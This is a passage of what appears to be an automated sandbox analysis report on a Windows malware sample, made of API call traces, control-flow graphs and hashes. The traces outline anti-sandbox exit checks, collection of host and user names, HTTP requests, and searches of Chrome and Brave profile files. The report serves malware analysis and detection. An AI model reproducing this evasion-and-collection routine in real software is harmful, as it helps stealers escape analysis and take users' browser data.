                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251CAB0), ref: 00419903
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02516580), ref: 0041991B
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02514EC8), ref: 00419933
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02515168), ref: 0041994C
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251CA20), ref: 00419964
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251C8A0), ref: 0041997C
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251C8E8), ref: 00419995
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251C960), ref: 004199AD
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,02514F88), ref: 004199C5
                        • Part of subcall function 00419860: GetProcAddress.KERNEL32(74DD0000,0251C9D8), ref: 004199DE
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                        • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416A17,00420AEF), ref: 0040116A
                        • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                        • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                        • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                        • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                        • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                        • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                        • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                        • Part of subcall function 00416770: GetUserDefaultLangID.KERNEL32(?,?,00416A26,00420AEF), ref: 00416774
                      • GetUserDefaultLCID.KERNEL32 ref: 00416A26
                        • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,025165B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                      • Sleep.KERNEL32(00001770), ref: 00416B04
                      • CloseHandle.KERNEL32(?,00000000,?,025165B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                      • ExitProcess.KERNEL32 ref: 00416B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                      • String ID:
                      • API String ID: 3511611419-0
                      • Opcode ID: 777e6741428d29f3ac2eda15a5f9635963f388c94dd1b9800fe8626475fd4fd3
                      • Instruction ID: 1c0ff58a553566d9d81a636820be0d4cb73d0efe44d476221655ae408a7450da
                      • Opcode Fuzzy Hash: 777e6741428d29f3ac2eda15a5f9635963f388c94dd1b9800fe8626475fd4fd3
                      • Instruction Fuzzy Hash: E1317074940208AADB04FBF2DC56BEE7339AF04344F10042EF102A61D2DF7C6986C6AE

                      Control-flow Graph

                      APIs
                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                      • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                      • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ??2@$CrackInternetlstrlen
                      • String ID: <
                      • API String ID: 1683549937-4251816714
                      • Opcode ID: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                      • Instruction ID: 59ffd934fb977a93d501bba2862ecb1df6a0defd032b503e5e890a78b3955a81
                      • Opcode Fuzzy Hash: 116f2b94f3778adbc9308d13d48d12011aa30bb27236a404a583900fa923c872
                      • Instruction Fuzzy Hash: 712149B5D00219ABDF10DFA5E849BDD7B74FF04320F008229F925A7290EB706A15CF95

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1493 401220-401247 call 4189b0 GlobalMemoryStatusEx 1496 401273-40127a 1493->1496 1497 401249-401271 call 41da00 * 2 1493->1497 1498 401281-401285 1496->1498 1497->1498 1500 401287 1498->1500 1501 40129a-40129d 1498->1501 1503 401292-401294 ExitProcess 1500->1503 1504 401289-401290 1500->1504 1504->1501 1504->1503
                      APIs
                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                      • __aulldiv.LIBCMT ref: 00401258
                      • __aulldiv.LIBCMT ref: 00401266
                      • ExitProcess.KERNEL32 ref: 00401294
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                      • String ID: @
                      • API String ID: 3404098578-2766056989
                      • Opcode ID: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                      • Instruction ID: f2ded3d157cb35307e0b39d430c96622be3dd75f8d5744ac0086d878f352425a
                      • Opcode Fuzzy Hash: e3d9931386e0fa91028f4e7641da7fda79c4023127bcc5196728e9d9e144d5c4
                      • Instruction Fuzzy Hash: 5901FBB0D84308BAEB10DBE4DC49B9EBB78AB15705F20809EE705B62D0D6785585879D

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1507 416af3 1508 416b0a 1507->1508 1510 416aba-416ad7 call 41aad0 OpenEventA 1508->1510 1511 416b0c-416b22 call 416920 call 415b10 CloseHandle ExitProcess 1508->1511 1517 416af5-416b04 CloseHandle Sleep 1510->1517 1518 416ad9-416af1 call 41aad0 CreateEventA 1510->1518 1517->1508 1518->1511
                      APIs
                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,025165B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416ACA
                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416AE8
                      • CloseHandle.KERNEL32(00000000), ref: 00416AF9
                      • Sleep.KERNEL32(00001770), ref: 00416B04
                      • CloseHandle.KERNEL32(?,00000000,?,025165B0,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00416B1A
                      • ExitProcess.KERNEL32 ref: 00416B22
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                      • String ID:
                      • API String ID: 941982115-0
                      • Opcode ID: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                      • Instruction ID: 3c4b1c3760862ff095f4b16c882d5da3ff279df4080b6ba6633acb61265b60b7
                      • Opcode Fuzzy Hash: 7c87040c747da0acdc92787bbe7dfdf8e9b0063e40ee03b256faf14453658583
                      • Instruction Fuzzy Hash: E9F0BE34A84219AFE710EBE0DC06BFE7B35EF04381F11451AF502A11C0CBB8A581D65F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: `o@
                      • API String ID: 0-590292170
                      • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                      • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                      • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                      • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                      APIs
                        • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                        • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                        • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0251CF40), ref: 00406303
                        • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                        • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0254DDD0,00000000,00000000,00400100,00000000), ref: 00406385
                        • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                        • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415228
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                      • String ID: ERROR$ERROR
                      • API String ID: 3287882509-2579291623
                      • Opcode ID: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                      • Instruction ID: 74302943fe5589af4790b43ef38c2dd3b69765dcd24c28c5b90e35499643ece9
                      • Opcode Fuzzy Hash: 287c4944f2ba1a5879c5b57656c8dc51a31da8e3a5e3b78fb2e1df7df1d21834
                      • Instruction Fuzzy Hash: 2D113330901008ABCB14FF61DD52AED7338AF50354F90416EF81A5A5D2EF38AB56CA9A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                      • HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                      • GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocComputerNameProcess
                      • String ID:
                      • API String ID: 4203777966-0
                      • Opcode ID: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                      • Instruction ID: 452d18c19ae851532a1d010ea63a4611fd0250a2e86211d30d2d96ca9096ca29
                      • Opcode Fuzzy Hash: 655548885853275668edecfa1cfdfba2d4285fba1d09bdc7eb36c2d1d55ec877
                      • Instruction Fuzzy Hash: 220186F1A48204EFD700DF94DD45BAABBB8FB05B11F10425AF545E3280C37859448BA6
                      APIs
                      • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416A1C), ref: 0040112B
                      • VirtualAllocExNuma.KERNEL32(00000000,?,?,00416A1C), ref: 00401132
                      • ExitProcess.KERNEL32 ref: 00401143
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Process$AllocCurrentExitNumaVirtual
                      • String ID:
                      • API String ID: 1103761159-0
                      • Opcode ID: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                      • Instruction ID: 516f97497d3ee46bc55051264f2a31c9d8efacdbd59bd60d04d859dfb32d17c4
                      • Opcode Fuzzy Hash: 3cbd8cc13bf7dc70ab035dff78f9dd202cda3002ce084c09b8f89ce2de56700b
                      • Instruction Fuzzy Hash: 76E08674985308FFE7106BE09C0AB0976B9EB05B05F101055F7087A1D0C6B826009699
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0252056B
                      • Module32First.KERNEL32(00000000,00000224), ref: 0252058B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892368314.000000000251E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0251E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_251e000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFirstModule32SnapshotToolhelp32
                      • String ID:
                      • API String ID: 3833638111-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: bd07a2f3bd918d7b6009e90f78a2e3f870bef806ab598047965825d59227b1ff
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: 3FF096352017256FD7203BF9A8CDB7E7AECBF5A624F100529E646D10C0DB70EC494A65
                      APIs
                      • SetErrorMode.KERNEL32(00000400,?,?,04100223,?,?), ref: 04100E19
                      • SetErrorMode.KERNEL32(00000000,?,?,04100223,?,?), ref: 04100E1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892669834.0000000004100000.00000040.00001000.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4100000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: 80487f4fec14bfac58550204fe4c6a52105a43d9f5fdd4282044df19e99fd448
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: C4D0123124512877D7002A94DC09BCD7F1CDF09B62F008051FB0DE9080C7B0954046E5
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Virtual$AllocFree
                      • String ID:
                      • API String ID: 2087232378-0
                      • Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                      • Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
                      • Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
                      • Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4
                      APIs
                        • Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
                        • Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
                        • Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F
                        • Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
                        • Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
                        • Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F
                      • ExitProcess.KERNEL32 ref: 004011C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$Process$AllocName$ComputerExitUser
                      • String ID:
                      • API String ID: 1004333139-0
                      • Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                      • Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
                      • Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
                      • Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 02520253
                      Memory Dump Source
                      • Source File: 00000000.00000002.1892368314.000000000251E000.00000040.00000020.00020000.00000000.sdmp, Offset: 0251E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_251e000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: dcd56b71e7f89be820ab7e6d00bb0033ec53f63b27d1601218614a2c46dfce5d
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: 22112879A00208EFDB01DF98C985E98BBF5AF08351F0580A5F9489B3A1D771EA90DF94
                      APIs
                      • wsprintfA.USER32 ref: 004138CC
                      • FindFirstFileA.KERNEL32(?,?), ref: 004138E3
                      • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413935
                      • StrCmpCA.SHLWAPI(?,00420F70), ref: 00413947
                      • StrCmpCA.SHLWAPI(?,00420F74), ref: 0041395D
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 00413C67
                      • FindClose.KERNEL32(000000FF), ref: 00413C7C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                      • String ID: !=A$%s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                      • API String ID: 1125553467-817767981
                      • Opcode ID: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                      • Instruction ID: 6b32dcbabd2ae606338a05af88a65253e6d0136fcb4401239c8972690a9ca057
                      • Opcode Fuzzy Hash: 8791cea4fdcc51078b83b32db4eaf7b09dc70f878dd535264430eb58c9f2cac6
                      • Instruction Fuzzy Hash: 45A182B5A40218ABDB20DFA4DC85FEA7379BF45301F04458DB50D96181EB789B84CF66
                      APIs
                        • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                        • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                        • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                        • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                        • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                        • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                        • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                      • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 0040BEF5
                      • StrCmpCA.SHLWAPI(?,004213F8), ref: 0040BF4D
                      • StrCmpCA.SHLWAPI(?,004213FC), ref: 0040BF63
                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0040C7BF
                      • FindClose.KERNEL32(000000FF), ref: 0040C7D1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1891395960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1891395960.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1891395960.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                      • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                      • API String ID: 3334442632-726946144
                      • Opcode ID: 5c56e59ca86658706cb83bd7e2d00e29abbc9545bfe97cd9c76cacf68a39fca7
                      • Instruction ID: 2d1308125da8926fdde3e90b6322e2b17ae592ee2aa58173b84b0ef8a3c681e1
                      • Opcode Fuzzy Hash: 5c56e59ca86658706cb83bd7e2d00e29abbc9545bfe97cd9c76cacf68a39fca7
                      • Instruction Fuzzy Hash: 4E42B871910104ABCB14FB71DD96EED733DAF44304F40456EB50AA60C1EF389B99CBAA
                      APIs
                      • wsprintfA.USER32 ref: 0041492C
                      • FindFirstFileA.KERNEL32(?,?), ref: 00414943
